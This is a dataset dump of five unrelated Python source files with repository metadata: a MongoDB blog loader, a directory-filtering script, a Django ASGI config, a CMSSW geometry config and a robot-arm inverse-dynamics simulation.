65ef235b341a2ed53566a7829d43c72fb9f90c2d | c860a9e47bde57dcd79e56c4c37c7009241273a4 | /pymongo lab/load_blogs.py | c31af1f7fcc290845f4fdbfccdc02d22671bf01e | [] | no_license | Svanderest/PymongoLab | 7ff653a9dacf5bd0584bef0e872c22d6a0f15199 | 1ff6a0bae562d9a039dd0e6096357573075af094 | refs/heads/master | 2020-09-11T17:48:15.590278 | 2019-11-16T18:36:35 | 2019-11-16T18:36:35 | 222,143,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from pymongo import MongoClient
from blogs import blog_docs
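# connect to a local mongod on the default port; use the lab4 database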
mongo_client = MongoClient("localhost", 27017)
db = mongo_client.lab4
coll = db.blogs
result = coll.insert_many(blog_docs)
print(result.inserted_ids)  # the raw InsertManyResult object is not informative when printed
| [
"[email protected]"
] | |
b5d1443e4df54b176657616d92dfbe081ce8b556 | 96d48a320ce5cc7ddcb4765a5590f26ce5dc6322 | /Masa1.py | 6da3a307cc92914e066ec321224b1331f65a2c81 | [] | no_license | xiaoxiaoniao1/python | 64d0b62a3bac7a46d0a9000b29874e7e9a55d97e | 88a3933923db66c565335888c293eaf45cdc7518 | refs/heads/master | 2021-06-08T13:56:14.171900 | 2021-05-26T06:23:12 | 2021-05-26T06:23:12 | 179,627,172 | 1 | 6 | null | 2019-04-20T19:48:34 | 2019-04-05T06:00:23 | Python | UTF-8 | Python | false | false | 201 | py | #code:UTF-8
import os
d = raw_input("dir:")
i = raw_input("s:")
a = os.listdir(d)
b = []
for i in a:
if 'p' in i:
b.append(i)
else:
continue
print(b)
| [
"[email protected]"
] | |
c19ff2aeb1e9f7c11f7efe6f7e5c6cf20d9c7498 | 23506d832dc5a96f51f74f4b70d2d97e9e61fcc1 | /SavedAndHealthy/asgi.py | 3c0d2867a38c9c1aaf8151ea773b367253a1c9c9 | [] | no_license | LuckyMyLove/SavedAndHealthy | c8f6714e78710c179c7453585eca7428fdd49cb7 | 7515b958afbc36e619f4150273b493e38cb61cc6 | refs/heads/master | 2023-05-02T04:01:31.069000 | 2021-05-25T17:44:49 | 2021-05-25T17:44:49 | 365,356,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
ASGI config for SavedAndHealthy project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SavedAndHealthy.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
57a098d0e612be1c8062d07da3a70e277c09f1d7 | d60fa37053a864b3d2e46c2d1b3d72b899743da9 | /SLHCUpgradeSimulations/Geometry/python/Longbarrel_cmsSimIdealGeometryXML_cff.py | 9fa1d317d0f31763fddbaf9440246ad58e1d0ec7 | [] | no_license | ikrav/cmssw | ba4528655cc67ac8c549d24ec4a004f6d86c8a92 | d94717c9bfaecffb9ae0b401b6f8351e3dc3432d | refs/heads/CMSSW_7_2_X | 2020-04-05T23:37:55.903032 | 2014-08-15T07:56:46 | 2014-08-15T07:56:46 | 22,983,843 | 2 | 1 | null | 2016-12-06T20:56:42 | 2014-08-15T08:43:31 | null | UTF-8 | Python | false | false | 1,204 | py | import FWCore.ParameterSet.Config as cms
# Mostly copied from Configuration/StandardSequences/python/Geometry_cff.py
# The Longbarrel version of the Phase 1 Pixel Upgrade (header adapted from the R39F16 variant)
from SLHCUpgradeSimulations.Geometry.Longbarrel_cmsSimIdealGeometryXML_cfi import *
from Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi import *
# Reconstruction geometry services
# Tracking Geometry
from Geometry.CommonDetUnit.globalTrackingGeometry_cfi import *
#Tracker
from RecoTracker.GeometryESProducer.TrackerRecoGeometryESProducer_cfi import *
#Muon
from Geometry.MuonNumbering.muonNumberingInitialization_cfi import *
from RecoMuon.DetLayers.muonDetLayerGeometry_cfi import *
# Alignment
from Geometry.TrackerGeometryBuilder.idealForDigiTrackerGeometry_cff import *
from Geometry.CSCGeometryBuilder.idealForDigiCscGeometry_cff import *
from Geometry.DTGeometryBuilder.idealForDigiDtGeometry_cff import *
# Calorimeters
from Geometry.CaloEventSetup.CaloTopology_cfi import *
from Geometry.CaloEventSetup.CaloGeometry_cff import *
from Geometry.CaloEventSetup.EcalTrigTowerConstituents_cfi import *
from Geometry.EcalMapping.EcalMapping_cfi import *
from Geometry.EcalMapping.EcalMappingRecord_cfi import *
| [
"[email protected]"
] | |
ff433bd16b447291bfbea865eb9eb96f0b4bbd54 | a79c524cc2826580e3d6d779f79a2b5fd078197a | /RobotPy/application/design_kr1p5_450.py | 01af07d5a4223948214e8cfc4a03d29634bb2c49 | [] | no_license | wulidexixilian/robotdesign | 0fc63f37318fb68eb8168af6c2b74aa01f9cc3bd | 4ba0dc7360f854f6d7be88834fa996e23a348ff5 | refs/heads/master | 2018-09-19T06:01:18.987937 | 2018-08-06T07:57:31 | 2018-08-06T07:57:31 | 126,000,164 | 1 | 4 | null | 2018-06-06T07:02:48 | 2018-03-20T10:26:18 | Python | UTF-8 | Python | false | false | 2,188 | py | import numpy as np
import matplotlib.pyplot as plt
from model import m_simulation as sim
from rRobotDB import pt_micro450 as cfg
from utility.compare_with_OPC import compare
plt.close("all")
np.set_printoptions(suppress=True)
np.set_printoptions(precision=4)
# *** build robot ***
s = sim.Simulation()
s.set_gravity(9.8 * np.array([0, 0, -1]))
load_dauer3 = {
"cm": np.array([35, 0, 70])*1e-3, "m": 1.5,
"iT": np.array([1200, 1200, 1200, 0, 0, 0])*1e-6
}
s.build_robot(
cfg.structure_para,
cfg.mass_para,
cfg.motor_para,
cfg.friction_para,
cfg.gear_para,
load_dauer3
)
q = [0, 0, 0, 0, 0, 0]
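# axis speed limits are given in deg/s and converted to rad/s here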
q_dot_max = np.array([300, 300, 450, 550, 550, 700]) / 180 * np.pi
q_dot = q_dot_max * 0.01
q_ddot = np.array([0, 0, 0, 0, 0, 0])
rs = s.get_result()
stall_tau = rs.get_stall_torque(q_dot_max, load_dauer3)
s.load_gear_characteristic(cfg.gear_para, stall_tau['tau_joint'])
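# the joint stall torques computed above are fed back into the gear model,
# presumably to scale the gear characteristic curves to this load case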
# *** kinematics ***
s.run_one_step(q, q_dot, q_ddot)
ax = s.snapshot()
s.show_cm(ax)
# *** inverse dynamic ***
percentage = 100 # amount of data to be simulated, 100% for all
trace_file = '../resource/trace/KR1_IPO/Test1_KRCIpo'
# *** load q(t) from trace file ***
s.load_trajectory(trace_file, percentage)
# *** inverse dynamic simulation ***
s.sim_inv_dynamic()
# *** animation ***
s.animate()
# *** result ***
rs = s.get_result()
motor_velocity_max = [
q_dot_max[i] * s.robot.drives[i].ratio / np.pi / 2 * 60 for i in range(6)
]
print('Achievable max motor velocity:\n', np.array(motor_velocity_max))
print('Zero position tcp: {}mm'.format(stall_tau['tcp']))
tau_stall_motor = stall_tau['tau_motor']
motor_percent = stall_tau['motor_percent']
print('Motor stall torque:\n {}Nm\n {}%'.format(tau_stall_motor, motor_percent))
print('Gear stall torque: {}Nm'.format(stall_tau['tau_joint']))
# rs.show_performance()
rs.drive_characteristic(30, 15, tau_stall_motor)
rs.get_max_drive_tau()
rs.joint_characteristic(cfg.gear_para)
rs.get_max_joint_tau()
gear_av_tau_percent = rs.gear_average_tau() /\
np.array([item['acc_tau'] for item in cfg.gear_para])
print('Gear average torque ratio: {}%'.format(gear_av_tau_percent * 100))
compare(s, trace_file, percentage)
plt.show(block=False)
| [
"[email protected]"
] |